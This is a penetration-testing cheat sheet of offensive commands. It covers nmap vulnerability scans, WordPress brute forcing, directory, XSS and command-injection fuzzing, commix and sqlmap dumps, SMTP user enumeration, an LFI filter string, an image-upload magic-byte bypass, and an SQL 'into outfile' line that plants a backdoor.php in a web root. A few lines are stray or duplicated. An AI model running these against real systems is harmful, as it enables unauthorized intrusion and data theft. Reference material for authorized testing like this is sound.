Commands for Engagements

A cheat-sheet selection of frequently used tools and commands for engagements. Consider it a reference guide to assist you during your cybersecurity assessments.

Nmap

# Nmap basic scans:
|
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --open
nmap -p- --script=vuln $IP

# HTTP-Methods:
|
nmap -p80,443 --script=http-methods --script-args http-methods.url-path='/directory/goes/here'

# SMB enumeration:
|
nmap --script smb-enum-shares
# grep IPs (strict dotted-quad match, each octet 0-255):
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE

WPScan & SSL

# full wpscan:
|
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u

# wpscan brute forcing:
|
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt

# aggressive Plugin Detection:
|
wpscan --url $URL --enumerate p --plugins-detection aggressive

Nikto

# nikto with SSL and Evasion:
|
nikto --host $IP -ssl -evasion 1

DNS_Recon

# basic dns recon scan:
|
dnsrecon -d yourdomain.com

Gobuster

# gobuster directory:
|
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30

# gobuster files:
|
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30

# gobuster for subdomains:
|
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30

WFuzz

# fuzz directories
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

# fuzz files
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

# fuzz users
|
wfuzz -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL"

# fuzz large words
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL"

# fuzzing xss
|
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL"
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL"

# command injection with post data
|
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL"

# test for parameter
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL"

# authenticated fuzzing directories
|
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"

Command injection

# command injection with commix: forced SSL, WAF detection skipped, random user agent.
|
commix --url="https://supermegaleetultradomain.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent

Sqlmap

# easy sqlmap
|
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl

# sqlmap dump
|
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump
/SecLists/Fuzzing/alphanum-case.txt

Social recon

# get social
|
theharvester -d domain.org -l 500 -b google

SMTP user enumeration

# smtp user enumeration
|
smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP

smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP

smtp-user-enum -M RCPT -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP

smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t $IP

SSH Tunnel

ssh -L 10000:127.0.0.1:10000 user@$IP

Misc

# command execution verification - ping check
|
tcpdump -i any -c5 icmp

# php filter check
|
php://filter/convert.base64-encode/resource=

# check network
|
netdiscover -r 0.0.0.0/24

# magic bytes for image upload
|
GIF89a1

# into outfile door
|
SELECT “” into outfile “/var/www/WEROOT/backdoor.php”;

# extract IPs from a text file (loose match; octets are not range-checked):
|
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt

Bash

Pull out IPv4 addresses

grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" your_file.txt
